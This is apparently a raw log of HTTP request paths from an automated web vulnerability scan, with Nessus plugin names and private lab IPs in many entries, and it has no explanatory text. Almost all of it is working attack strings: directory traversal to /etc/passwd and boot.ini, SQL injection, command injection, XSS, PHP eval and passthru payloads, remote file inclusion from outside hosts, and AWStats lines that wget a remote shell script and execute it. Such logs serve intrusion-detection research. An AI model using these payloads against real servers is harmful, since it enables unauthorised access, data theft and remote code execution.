/examples/jsp/colors/ion-p.exe?page=../../../../../etc/passwd /javascript/document.pm /scripts/hivjyzlc.exe /manager/quickstore.cgi?page=../../../../../../../../../../etc/passwd\x00html&cart_id= /javascript/attic.exe /a0imiuf1.idc? /help.php?q=;rm\x09q36511176\x09# /iv5vkgam.htm? /admin/common/script.js.php.~1~ /cgi-bin/sgdynamo.exe?htname= /scripts/guestbook/cfooter.php3 /en-us/account/snpfiltered.pl?t=c&u= /cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332008329',null,null,null,null -- /169okeyj.mscgi? /javascript/libs.exe /top.php?stuff="&rm;q42621598&rem; /scripts/includer.cgi?template=includer_rcmdexec.nasl /test.php?evalme=eval($_server[http_x_slmroetlrezvxzaf]); /examples/jsp/checkbox/awstatstotals.php?sort="].passthru('id').exit().$a[" /javascript/wow.exe /zqqemp6j.do? /textdescriptors/ /scripts/shop.plx/page=nessus1529511011 /main.php?stuff="del,q47628643&rem, /bin/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /examples/jsp/jsp2/el/ncbook/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /webdav/c99.php?act=f&f=snort_2_9_2_1_installer.exe&ft=download&d=c:\users\administrator\desktop /i686v90l.dll? /nav_subscriptions/ /includes/phpdig/includes/config.php?relative_script_path=http://192.168.202.118:8080/zz5thkvtmlgl? /en-us/esmozg5d.jspa? /opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/4dckqcc0acprbz?\x00 /help.php?q='\x0drm\x09q24981853\x09# /fc9t54l7.nsf? /scripts/profil.php?id=1 /scripts/vhost.php?action=logout&time=1332008315 /examples/jsp/jsp2/jspx/whois.cgi?action=load&whois=;id /javascript/email.exe /examples/jsp/error/secure.php?cfgprogdir=/etc/passwd\x00 /0z575z74.mscgi? /bl8sefdm.kspx? /t3af3tdz.asp? /javascript/esale.exe /? /.jspa /9o6g5vkn.x? /administrator/gallery/uploadimage.php?directory=\" /main.php?stuff="\x0dsleep 11 # /x7pclv4s.nsf? /6dlc2zm9.jspa? /gvx7m5ti.kspx? /examples/jsp/cal/index.php?cid=' /main.php?stuff="\x0adel q55324883 # /xssattacks/ /top.php?stuff=&ver;>q55714714&rem; /o1zj4u9v.fts? /libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl /07_scripted/ /cgi-bin/fileseek.cgi?head=;cat /etc/passwd|&foot= /nyjgaorz.fts? /manager/install.php?newlang=../../cpg_error.log\x00 /javascript/htpasswd.rar /dslpwt15.cfc? /update_script/ /en-us/h5sc3gxy.jspa? /examples/jsp/sessions/index.php?id=' /scripts/search.scr.php?globals[pth][classes]=http://192.168.202.118:8080/moclyxlwqyfjnp?? /mod_membre/inscription.php?chemin=http://192.168.202.96:8080/4dckqcc0acprbz?? /scripts/base_local_rules.php?dir= /7o5qp766.pl? /examples/jsp/colors/newsscript.pl?mode=admin /? /hrttz9fj.html? /copatranscript_20061109/ /phpmyadmin/carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog /en-us/account/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd|| /examples/jsp/jsp2/jspx/index.php?module= /javascript/base.exe /javascript/admin.exe /help.php?q='sleep\x097\x09# /examples/jsp/colors/index.php?cat=' /en-us/account/way-board/way-board.cgi?db=/etc/passwd\x00 /cgis/vssetcookie.exe /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.28.202/main.php%3fstuff%3d1985387140&frm_user=q68976489&scr_height=&scr_width= /scripts/gallery/displaycategory.php?basepath=http://xxxxxxxx /citizen's guide to crime reporting/ /cgi-local/vssetcookie.exe /fpnpp5zg.asp? /www/delivery/ac.php?bannerid=-1331905039+or+1=1+--+';passthru(base64_decode($_server[http_nessus_jtipnlkz]));die;/* /examples/jsp/jsp2/el/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /javascript/functions.exe / /help.php?q=uname >q89616884 # /scripts/samples/search/author.idq /javascript/custom.exe /zmvq66jy.exe? /bzuf9ozq.html? /javascript/replication.exe /ybz5rz7a.mscgi? /1qwv2p5p.dll? /scripts/c0kha6w3apd3.php /iktok2bw.asp? /scripts/rih28haesl0j.asp /d7ktpmcq.pl? /subscriptions.ws /main.php?stuff='\x0auname >q31711746 # /javascript/dms0.exe /recordings/?user=jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--&file=index&pass= /subscriptions.csv /subscriptions.xslt /fc9t54l7.html? /top.php?stuff="&ver >q51692947&rem /javascript/websvn.exe /scripts/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd /q703m78q.cgi? /scripts/starnet/addons/slideshow_full.php?album_name='1085138732 /scripts/modules.php?name=my_egallery /help.php?q=|ping;-w;9000;-n;1;4.3.2.1|rem; /fcgi-bin/testcgi.exe /en-us/account/sgdynamo.exe?htname= /confirmunsubscription.php?output=http://192.168.202.96:8080/llumt7msyau5y? /g8nu2yy7.cgi? /en-us/7o5qp766.cfm? /phpmyadmin/documentation.html?phpmyadmin=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd /6qbynt4f.html? /examples/jsp/error/detail.asp?nchannel='1 /aj3pf49c.mscgi? /fo564rei.fts? /phpmyadmin/index.php?show=/etc/passwd /examples/jsp/sessions/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd /scripts/admin/setup.php /javascript/.htpasswd.sfish/0000012345 /? /qczkquis.exe? /cgi-win/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /? /help.php?q=rm;q25171792&rem; /script_path/config.inc.php?_path=http://192.168.202.96:8080/no4ghqiguzhst?? /javascript/.htpasswd.sfish/'`false`' /error/\..\..\..\..\autoexec.bat /help.php?q="\x0adel q61288617 # /javascript/select.exe /8t9v8k7x.fts? /javascript/blogspot.exe /examples/servlets/servlet/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00 /en-us/odzk29aa.cfc? /awstats/awstats.pl?migrate=|echo;wget -p /tmp/ http://192.168.202.102:80/awsegguqmpi3jn8mvmjdy3ywvcwwaa/jbqahurnly.sh;echo|awstats571393.txt /examples/jsp/num/php.cgi?/etc/passwd /main.php?logout=&ver\x0b>q39725894&rem\x0b /webevent.pl?cmd=> /main.php?logout='&uname\x09>q65543975\x09# /scripts/status.php3 /examples/jsp/cal/base_local_rules.php?dir= /9kr0ih0v.dll? /javascript/promo.exe /? /cacti/admin.php?style=../../../../../../../../../../../../etc/passwd\x00 /top.php?stuff=\x0duname\x09>q64895542\x09# /main.php?logout="ver&rem\xa0 /en-us/s7qus4g3.php3? /3hlysl2x.jspa? /scripts/t99iadgtkf9h.sh /zmvq66jy.cgi? /mais_descriptions2/ /phpmyadmin/index.php?setlang=gcards_dir_transversal.nasl&lang[gcards_dir_transversal.nasl][file]=../../../../../../../../../../../../etc/passwd /examples/jsp/jsp2/jspx/calendar_admin.pl?config=|cat /etc/passwd| /help.php?q=uname >q77228311 # /t578vqea.jspa? /3hlysl2x.php? /main.php?stuff=;sleep 11 # /cgi-home/.htpasswd /if69ddo1.jspa? /examples/jsp/error/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl /examples/jsp/num/cgiip.exe/wservice=wsbroker1/webutil/ping.p /prodlist.asp?brand= /tukodz3j.php3? /examples/jsp/cal/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\x00 /javascript/denied.exe /javascript/office.exe /scripts/nryr3lvrjnwx.php /examples/jsp/jsp2/el/whois.cgi?action=load&whois=;id /examples/jsp/jsp2/jspx/review.php?id=1&cat=&subcat="> /help.php?q='\x0ddel\x09q85664498\x09# /j4oqyvga.exe? /hipkz026.kspx? /shopaddtocart.asp?productid='42 /javascript/~nobody.exe /examples/jsp/cal/search.jsp?q=%" / /examples/servlets/servlet/forum.php?do=viewtopic&cat=1&topic=1&page=1? /i7prbs22.do? /en-us/manager/permissions/launcher/data/ui/nav/default?uri=/servicesns/nobody/xss/data/ui/nav/default /i7prbs22.kspx? /scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331923204','5'-- /javascript/option.exe /rv98iwjp.aspx? /scripts/wihphoto/start.php /scripts/apgafvcxoeeh.pl /eei78ore.exe? /phpmyadmin/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd /7o5qp766.cfc? /3m5knyc4.pl? /subscriptions.rtf /egaet53a.nsf? /cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd /applescripting/ /vhzmaia2.jsp? /scripts/apgafvcxoeeh.inc /scripts/piywzua5hwer.cgi /bn857frh.cfc? /1qwv2p5p.php3? /hjdzm96v.php? /index.php?do=index&dummy=dummy');alert('414165590323');void(' /scripts/ylrvly9nh_pf.sh /l4fz1dqw.php? /scripts/modules/phprpc/server.php /..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf../winnt/system32/cmd.exe?/c+dir+c:\+/og /en-us/9kr0ih0v.jspa? /includes/phpdig/includes/config.php?relative_script_path=http://cirt.net/rfiinc.txt? /cgi-bin/ion-p?page=../../../../../etc/passwd /x980t-description/ /mv8wxfy9.cfm? /n9xlumt5.do? /ygkjkngd.pl? /servlet/org.apache.catalina.globals/ /examples/jsp/checkbox/shopaddtocart.asp?productid='42 /h5sc3gxy.php3? /b5xdqgz2.asp? /top.php?stuff="&del q85227619&rem /vmi8bb12.jspa? /g3w7y7u5.cgi? /en-us/33y9gcqq.html? /top.php?stuff=&ping;-w;11000;-n;1;4.3.2.1&rem; /manager/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /examples/jsp/checkbox/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id /y8pmygrp.jspa? /cgi.cgi/gwweb.exe?help=bad-request /library/classes/prescription.class.php shopdisplayproducts.asp?id=1&cat= /fmnveedu.x? /de'buger/ /"they told you so"/ /if69ddo1.html? /cacti/include/theme.inc.php?fullpath=/etc/passwd\x00 /exchange/..\xc0%qf..\xc0%qf..\xc0%qf..\xc0%qf..\xc0%qf../winnt/system32/cmd.exe?/c+dir+c:\+/og /examples/servlets/servlet/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\x00 /kb.asp?a="> /ddoworrl.htm? /gy23xnjq.cfc? /rank-'em/ /jujgxwav.nsf? /cgi-bin/ovlaunch.exe /psuser/pscoerrpage.htm?errpagepath=/etc/passwd /scripts/1hactwocbsuo.asp /scripts/n4p4f4gtbhia.shtml /6dlc2zm9.x? /0z575z74.pl? /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/zoywsxjghe.sh+>+/dev/null+&'); function v /weq93ppb.jsp? /o1zj4u9v.jsp? /fcgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd /cgi-bin/mkilog.exe /fpnpp5zg.exe? /phpmyadmin/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd /..\/..\/..\/boot.ini /esmozg5d.kspx? /weq93ppb.exe? /cgi-bin/webcart/webcart.cgi?config=mountain&change=yes&nextpage=;cat /etc/passwd|&code=phold /apavxugx.exe? /b5xdqgz2.html? /main.php?stuff='\x0auname\x09>q89799943\x09# /o1zj4u9v.cgi? /subscriptions.html /mpcgi/.passwd /8x6w469u.x? /7o5qp766.fts? /um7xpn15.idc? /1995_silvia saint's leg sex friends/ /scripts/errors/needinit.php?gallery_basedir=http://xxxxxxxx/ /scripts/index.php?src=1&_common=1&time=1331919011&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /cgi-bin/..\xc0/..\xc0/..\xc0/..\xc0/..\xc0/../winnt/system32/cmd.exe?/c+dir+c:\+/og /editprojectissue.do?projectissueid="><" /examples/servlets/servlet/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd /quagynka.cfm? /cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1331908741,4--&blog=1 /editor's_letter/ /login/?user=|"`id`"| /scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- /webdav/phprun.php?cmd=c:\service32.exe /scripts/irbf6nj7oyfh.pl /manager/al_initialize.php?alpath=/etc/passwd\x00 /examples/servlets/servlet/whois.cgi?action=load&whois=;id /javascript/document.xsl /main.php?stuff="|ping -w 7000 -n 1 1.2.3.4|rem /javascript/htpasswd.tar.gz /examples/jsp/num/index.php?p='nessus /rbec2ohx.htm? /javascript/document.swf /top.php?stuff='&rm q61677415 # /o6ebbirj.mscgi? /phpmyadmin/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html /82q7ywa8.nsf? /include/default_header.php?script_path=http://192.168.202.118:8080/2aibfaczmac8? /msadc/..\xc1\xc1..\xc1\xc1..\xc1\xc1..\xc1\xc1..\xc1\xc1../winnt/system32/cmd.exe?/c+dir+c:\+/og /iajtej82.htm? /dslpwt15.dll? /javascript/_src.exe /cgi-bin/info2www '(../../../../../../../bin/mail root /uvazfs7p.exe? /odzk29aa.jspa? /manager/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd /mv8wxfy9.do? /javascript/mini.exe /uvazfs7p.html? /phpmyadmin///../../../../../../../..windows/win.ini /hipkz026.cfc? /phpmyadmin/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl /scripts/www/delivery/ac.php?bannerid=-1331918977+or+1=1+--+';passthru(base64_decode($_server[http_nessus_dv8rullj]));die;/* /awstats/awstats.pl?migrate=|echo;/./tmp/wgwvwkorhp.sh;echo|awstats540737.txt /cgibin/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\x00.html /javascript/module.exe /1r8cfrlf.jspa? /flash mx 2004 actionscript bible/ /javascript/htpasswd.cfm /cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd /fpnpp5zg.php3? /examples/jsp/error/welcome.php?custom_welcome_page=/etc/passwd\x00 /manager/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\x00 /cgibin/vssetcookie.exe /scripts/polls.scr.php?globals[pth][classes]=@rfiurl?globals[pth][classes]=@rfiurl? /en-us/s7qus4g3.cfc? / /examples/jsp/jsp2/jspx/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd /main.php?logout="&rm q77567986 # /eventstranscripts/ /supporter/index.php?t=updateticketlog&id=<script></script> /scripts/gw5/gwweb.exe?htmlver=aaa&get-context /javascript/doubleclick.exe /manager/search.php?allwords=
&cid=0&title=1&desc=1 /recordings/newsscript.pl?mode=admin /examples/servlets/servlet/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd /7u1pb2xi.jsp? /admin/news.admin.php?path_to_script=http://192.168.202.96:8080/frznctvhi0i5??&cmd=ls /javascript/gwt.exe /javascript/oracle.xml.xsql.xsqlservlet.exe /help.php?q="ping\x09-w\x097000\x09-n\x091\x091.2.3.4&rem\x09 /en-us/esmozg5d.asp? /top.php?stuff="ping,-w,11000,-n,1,4.3.2.1&rem, /modules/mydownloads/ratefile.php?lid=1">
> /tmp/ldlchhikup0;echo|awstats244464.txt /script/menu/menuadministration.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp? /ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.118:8080/tzhfyzkbomspvm?' /manager/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00 /lmw4r201.php3? /static//..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd /scripts/login.cgi /scripts/include/error/forumerror.cfm?errorno=3 /top.php?stuff="&sleep\x0911\x09# /8t9v8k7x.mscgi? /scripts/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00 /examples/jsp/num/rss.php?blogid=1&profile=../../config/config.properties.php\x00 /g8nu2yy7.fts? /top.php?stuff='\x0duname # /top.php?stuff="del,q89398857&rem, /weq93ppb.php? /top.php?stuff="rm\xa0q42369787&rem\xa0 /javascript/readme.exe /b1q8bywu.html? /main.php?logout=|ping;-w;11000;-n;1;4.3.2.1|rem; /ke-description/ /main.php?stuff="\x0ddel q12524199 # /examples/jsp/error/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\x00.html&passurl=/category/ /scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 99859533-- /top.php?stuff="\x0auname >q15138829 # /top.php?stuff=&ver\x09>q15482881&rem\x09 /606wkcop.jsp? /en-us/account/search.php?allwords=
&cid=0&title=1&desc=1 /jdx255ea.php? /qczkquis.php? /top.php?stuff="&ping -w 7000 -n 1 1.2.3.4&rem /examples/jsp/jsp2/el/index.php?search='>&searchmode=f /newsubscription/ /a0imiuf1.htm? /teagan's juice/ /j734qobz.nsf? /scripts/nffhikq061nq.shtml /jdx255ea.mscgi? /cacti/index.php?site=../../../../../../../../etc/passwd\x00 /cacti/whois.cgi?action=load&whois=;id /main.php?stuff="&ping -w 8000 -n 1 4.3.2.1&rem /en-us/dda2qr7j.htm? /zqqemp6j.jsp? /examples/servlets/servlet/fxm.exe /javascript/community.exe /admin/departments.php?projectissueid="><" /article.cfm?id=1' /9ko6m4c8.cgi? /6n7aacgg.htm? /modules.php?name=surveys&pollid= /examples/jsp/colors/ovlaunch.exe /cgi-bin/mmstdod.cgi?alternate_templates=| echo "content-type: text/html";echo "" ; id\x00 /map of tim's moves/ /scripts/gtcatalog/password.inc /examples/jsp/num/mmstdod.cgi?alternate_templates=| echo "content-type: text/html";echo "" ; id\x00 /examples/jsp/cal/shopexd.asp?catalogid='42 /evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332008334,1061714587 -- /starnet/addons/slideshow_full.php?album_name='1125155541 /examples/jsp/jsp2/el/mmstdod.cgi?alternate_templates=| echo "content-type: text/html";echo "" ; id\x00 /examples/jsp/sessions/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\x00 /javascript/parse.exe /scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332009306,0x3a,1514709258),3,4,5,6,7,8,9,10,11,12,13,14,15,16 /javascript/cache.exe /scripts/nph-exploitscanget.cgi?host=`id`&port=443&errchk=0&idsbypass=0 /script/init/createallimagecache.php?path_to_code=http://192.168.202.118:8080/ghl9il? /examples/jsp/error/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd /main.php?stuff='uname\x09>q23771746\x09# /javascript/complaints.exe /vmi8bb12.x? /cacti/faq.php?action=&type=view&s=&id=-1' union select 0,1200572060,0,0,0,0,0-- /5o9zq43e.nsf? /? /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919142&lang_crm=../../vtigerservice.php\x00 /help.php?q=";sleep 8 # /scripts/go.cgi|id| /javascript/dvd.exe /zqqemp6j.cfm? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+5b+0c+83+c3+0c+89+da+8b+5b+04+39+d3+75+01+cc+8b+73+30+89+ef+6a+0d+59+66+ad++>>esbq /examples/jsp/sessions/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd /help.php?q="&ver\x09>q66498964&rem\x09 /javascript/int.exe /h5sc3gxy.exe? /cgi-perl/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /forum1_professionnel.asp?n=1771&nn=/etc/passwd&page=1 /main.php?stuff='\x0ddel\x09q87288375\x09# /cgi-bin/search.jsp?q=%" /counter_script/ /scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=bhclbg8njf27mdlhg /opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.118:8080/moclyxlwqyfjnp?\x00 /examples/jsp/sessions/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00 /examples/jsp/cal/login.php?course="> /protection.php?action=logout&siteurl=/etc/passwd /5o9zq43e.cfc? /help.php?q="|ping;-w;11000;-n;1;4.3.2.1|rem; /h4bi26jd.kspx? /? /zroo33l4.mscgi? /top.php?stuff="rm\x0bq81585151&rem\x0b /h5i6crm3.htm? /en-us/jnv890lt.cgi? ..\..\..\..\..\..\..\..\..\..\windows\win.ini /admin/index.php?path_to_script=http://192.168.202.96:8080/swgnhpydbq0t??&cmd=ls /my_subscriptions/ /miz4r5hz.cgi? /examples/jsp/checkbox/edit.jsp?page=user&editor=../../../install /help.php?q='del q41634876 # /examples/jsp/error/search/results.stm?indexname=>">&style=fancy&spage=60&query=folder name /javascript/incubator.exe /scripts/crossdomain.xml /cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/cf5_connector.cfm?command=fileupload&type=file¤tfolder=/ /lmw4r201.jsp? /javascript/2006.exe /examples/jsp/jsp2/el/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo /3j8echh0.cfm? /scriptswf_information/ /en-us/account/commerce.cgi?page=../../../../../etc/passwd\x00index.html /fa8p8lr8.exe? /javascript/rule.exe /j734qobz.kspx? /scripts/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /en-us/account/sendtemp.pl?templ=../../../../../etc/passwd /killen'/ /scs86g1p.htm? /top.php?stuff="ver;>q52915956&rem; /help.php?q="\x0auname >q51358327 # /examples/jsp/error/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo /byrg33fw.cfm? /phpmyadmin//%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd /eei78ore.php? /certsrv/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir /examples/jsp/checkbox/index.php?site=../../../../../../../../etc/passwd\x00 /byrg33fw.htm? /oie504mr.asp? /help.php?q=ver\x0b>q14773727&rem\x0b /scripts/..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf../winnt/system32/cmd.exe?/c+dir+c:\+/og /bxnyrhmh.do? /main.php?logout=|ping;-w;9000;-n;1;4.3.2.1|rem; /cacti/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org /javascript/tech.exe /javascript/efforts.exe /ddoworrl.exe? /zv8tv7h8.cfc? /scripts/t769qwej0llr.shtml /index.php?topic=&lt;script&gt;alert(document.cookie)&lt;/script&gt; /cacti/index.php?string=' /updatesubscriptions/ /examples/jsp/checkbox/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\x00&bn=fm_d1 /main.php?logout="uname >q68212743 # /3j8echh0.jsp? /manager/popup.php?include_path=/etc/passwd\x00 /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+del+ctdn /main.php?logout=;rm\x09q38215685\x09# /scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332010411,0x3a,1017948332),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 /bemarket/postscript/postscript.php?p_mode=http://192.168.202.96:8080/llumt7msyau5y? /script/ident/identification.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm? /examples/servlets/servlet/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini /scripts/bb_func_txt.php?pathtofiles=/etc/passwd\x00 /scripts/awstats.pl /scripts/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\x00gwextranet_template_dir_traversal.nasl /phpmyadmin/cgiforum.pl?thesection=../../../../../../../../etc/passwd\x00 /169okeyj.asp? /scripts/view/twiki/webhome /ju0u7kfo.aspx? /examples/jsp/cal/catalog.php?action=category_show&id=' /javascript/developer.exe /nmw0do67.php? /index.php?site=../../../../../../../../etc/passwd\x00 /examples/jsp/jsp2/jspx/add_url.htm?node= /webtools/bonsai/showcheckins.cgi?person= /webcgi/windmail.exe /ghswfouu.php3? /d44uk9h2.fts? /miz4r5hz.jspa? /javascript/document.xml /? /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width=q16581979 ftp://192.168.25.253/* /awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/ptsrmtfadl.sh;echo|awstats270984.txt /scripts/lrn28issfuqi.sh /javascript/theme.exe /cgi-915/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\x00.html /en-us/manager/search/data/inputs/script/_new /en-us/i686v90l.fts? /lmw4r201.x? / /cms/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\x00 /scriptv0117973_3/ /search.jsp?q=%" /javascript/search.exe /javascript/registered.exe /0qhcnefz.htm? /nyvbv05h.jspa? /javascript/.passwd.cs /help.php?q="\x0auname >q61288617 # /o1zj4u9v.jspa? /scripts/buoalakxhatu.asp /main.php?stuff=\x0duname\x09>q32478423\x09# /advancedxss/ /javascript/es.exe /copying/q33749448&q3338"q3338q33749448 /examples/jsp/num/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'-- /scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331908740,4,5 /static//\..\..\..\..\..\..\..\..\etc/passwd /uvazfs7p.pl? /javascript/document.csproj /en-us/w4996nr0.idc? /edzaia0i.cgi? /en-us/i686v90l.cfc? /top.php?stuff=&ping;-w;10000;-n;1;1.2.3.4&rem; /help.php?q=&uname\x09>q27714341\x09# /cgi.cgi/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /vac1l5vm.cfm? /ddoworrl.jspa? /javascript/document.dll /main.php?stuff=ver\x0c>q17742625&rem\x0c /hrttz9fj.cgi? /cgi-bin/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@ /examples/jsp/colors/al_initialize.php?alpath=/etc/passwd\x00 /"james kim"/ /tukodz3j.idc? /scripts/usrdetails.php?sgnuptype=csaleid /htbin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd /examples/jsp/cal/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\x00 /javascript/chat.exe /examples/jsp/jsp2/el/classes/adodbt/sql.php?classes_dir=/etc/passwd\x00 /examples/jsp/jsp2/el/_head.php?_zb_path=../../../../../../../../../../etc/passwd\x00 /fcgi-bin/.htpasswd /machine_d'anticyth\xc3\xa8re/ /0w155a7c.php3? /en-us/fo564rei.html? /j2kdmfw4.do? /top.php?stuff='rm\x09q68811991\x09# /pls/simpledad/admin_/adddad.htm? /scripts/superguestconfig /uc3w3bdi.nsf? //q99252119&q8892"q8892<q8892>q99252119 /scripts/rss.scr.php?globals[pth][classes]=http://192.168.202.118:8080/tzhfyzkbomspvm?? /cacti/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /instant-xss/ /examples/jsp/colors/cgiwrap/cgiwrap_error_page_handling_xss.nasl /news/scripts/news_page.php?script_path=http://192.168.202.96:8080/4dckqcc0acprbz?? /javascript/ows.exe /awstats/awstats.pl?migrate=|echo;wget -p /tmp/ http://192.168.202.102:80/awseggfh7vlzdb7fbriizix4smdaaa/qkzpkuflrb.sh;echo|awstats129892.txt /examples/jsp/num/classes/adodbt/sql.php?classes_dir=/etc/passwd\x00 /hrttz9fj.jspa? /main.php?logout=&uname\x09>q53473158\x09# /static//..\..\..\..\..\..\..\..\windows/win.ini /comment-script/ /javascript/document.core /phpmyadmin/backend/classes.php?include_path=../lib/jinzora.js\x00 /examples/jsp/cal/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /eg2u8pbv.aspx? /help.php?q=&ping;-w;8000;-n;1;4.3.2.1&rem; /h5sc3gxy.mscgi? /help.php?q=;uname >q47158875 # /include/default_header.php?script_path=@rfiurl /javascript/irc.exe /prospect microsoft's money/ /examples/jsp/jsp2/jspx/secure.php?cfgprogdir=/etc/passwd\x00 /en-us/.do /javascript/enc.exe /jnt3f86c.cfc? /hrttz9fj.asp? /member/usercp_menu.php?script_folder=http://192.168.202.118:8080/moclyxlwqyfjnp? /v3axg1p8.kspx? /main.php?stuff=&del;q26155749&rem; /scripts/a1disp3.cgi?/../../../../../../etc/passwd /javascript/00.exe /fpnpp5zg.aspx? /help.php?q='\x0asleep\x097\x09# /fcgi-bin/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd| /quagynka.cfm? /top.php?stuff="ping -w 11000 -n 1 4.3.2.1&rem /javascript/url.exe /cgiip.exe/wservice=wsbroker1/webtools/oscommand.w /main.php?logout=";sleep 8 # /top.php?stuff='|sleep 8 # /cgi-bin/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\x00 /webchat/register.php?register=yes&username=overg&email=&email1= /mail.php?id='/**/union/**/select/**/1,2,1331909424,4--&blog=1 /cacti/newsdesk.cgi?t=../../../../../../etc/passwd /main.php?stuff="ping\x0b-w\x0b7000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b /iajtej82.aspx? /scripts/index.php?edit=nonexistant82887053 /en-us/fo564rei.fts? /examples/jsp/checkbox/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\x00 /faq.php?action=&type=view&s=&id=-1' union select 0,708862898,0,0,0,0,0-- /cacti/backend/classes.php?include_path=../lib/jinzora.js\x00 /xlj7h65o.cfc? /main.php?logout=uname >q22655649 # /prest_inscript1/ /phpmyadmin/base_local_rules.php?dir= /3m5knyc4.aspx? //

